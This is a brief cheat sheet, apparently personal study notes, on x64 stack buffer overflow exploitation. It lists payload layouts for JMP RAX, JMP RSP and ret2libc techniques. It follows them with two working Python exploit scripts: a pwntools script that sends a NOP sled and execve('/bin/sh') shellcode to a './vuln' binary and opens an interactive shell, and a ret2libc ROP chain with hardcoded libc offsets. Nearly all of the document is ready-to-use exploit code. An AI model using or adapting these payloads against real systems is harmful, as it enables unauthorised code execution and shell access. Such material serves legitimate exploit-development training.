X64 Exploit concepts

#JMP RAX 
Final Exploit - `nops + shellcode + JUNK + JMP RAX`

#JMP RSP - use when there is not enough space for shellcode before RIP register. 
Final Exploit - `JUNK + JMP RSP +  nops + shellcode`

#64-bit NX enabled RET2LIBC - 
Final Exploit - `JUNK + RET +  POP RDI; RET + /bin/sh + system + exit`

Simple BOF 

from pwn import *

nops = b"\x90"*30
shellcode = ("\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")

buffer = b"A" *(256 -len(nops) - len(shellcode)) 
buffer += b"B"*8
buffer += p64(0x7fffffffdc98) # Somewhere start of NOPS


payload = nops + shellcode + buffer 

# Launch the vulnerable program and feed it the payload
p = process(['./vuln', payload])
p.interactive()

NX/DEP Bypass - RET2LIBC

# Final Exploit - `JUNK + RET +  POP RDI; RET + /bin/sh + system + exit`

from struct import *

libc_base = 0x00007ffff79e2000

buffer = b"A"*256
buffer += b"B"*8                                        #RBP 
buffer += pack("<Q",libc_base + 0x00000000000008aa)     #RET 
buffer += pack("<Q",libc_base + 0x0000000000086388)     #RIP - pop rdi, ret
buffer += pack("<Q",libc_base + 0x001b3d88)             #/bin/sh address
buffer += pack("<Q",0x7ffff7a31420)                     #System address
buffer += pack("<Q",0x7ffff7a25110)                     #Exit address

print (buffer )